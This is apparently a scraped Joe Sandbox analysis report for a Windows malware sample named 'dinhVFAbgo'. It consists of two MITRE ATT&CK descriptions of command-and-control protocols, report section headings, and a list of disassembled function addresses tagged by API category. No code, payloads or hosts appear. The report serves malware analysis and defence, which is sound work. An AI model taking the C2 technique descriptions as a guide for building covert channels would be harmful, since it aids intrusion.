Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report dinhVFAbgo

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Statistics

CPU Usage

Memory Usage

Windows Analysis Report
dinhVFAbgo

Function 00CA8A72 Relevance: 57.9, APIs: 22, Strings: 11, Instructions: 169
sleepthreadlibraryCOMMON

Function 00CA5FC9 Relevance: 52.9, APIs: 16, Strings: 14, Instructions: 433
sleepfileCOMMON

Function 00CA889D Relevance: 36.2, APIs: 24, Instructions: 166
memorythreadCOMMON

Function 00CAC295 Relevance: 16.6, APIs: 11, Instructions: 137
fileCOMMON

Function 00CA5D23 Relevance: 4.6, APIs: 3, Instructions: 69
comCOMMON

Function 00CD91A9 Relevance: 70.4, APIs: 35, Strings: 5, Instructions: 370
stringCOMMON

Function 00CD96DD Relevance: 64.8, APIs: 43, Instructions: 298
COMMON

Function 00CAD917 Relevance: 15.1, APIs: 10, Instructions: 109
memoryCOMMONLIBRARYCODE

Function 00CAD7A6 Relevance: 12.0, APIs: 8, Instructions: 34
COMMON

Function 00CAB0EA Relevance: 10.7, APIs: 7, Instructions: 153
networkCOMMON

Function 00D7A0DE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 38
COMMON

Function 00CA52E9 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 165
COMMON

Function 00CA7606 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40
networkCOMMON

Function 00CA7685 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71
networkCOMMON

Function 00CD8EE2 Relevance: 6.1, APIs: 4, Instructions: 59
COMMON

Function 00CADB0E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44
COMMONLIBRARYCODE

Function 00CABE73 Relevance: 4.7, APIs: 3, Instructions: 160
fileCOMMON

Function 00CA5559 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17
COMMON

Function 00CA8C59 Relevance: 49.3, APIs: 18, Strings: 10, Instructions: 287
registryserviceCOMMON

Function 00CD313E Relevance: 39.1, APIs: 21, Strings: 1, Instructions: 566
windowstringCOMMONCrypto

Function 00CA6C70 Relevance: 33.4, APIs: 4, Strings: 15, Instructions: 100
COMMON

Function 00D09483 Relevance: 30.1, APIs: 16, Strings: 1, Instructions: 341
windowkeyboardCOMMON

Function 00CF4F06 Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 305
windowCOMMON

Function 00D0D1DF Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 439
windowCOMMONCrypto

Function 00CA863A Relevance: 22.6, APIs: 15, Instructions: 116
threadprocessCOMMON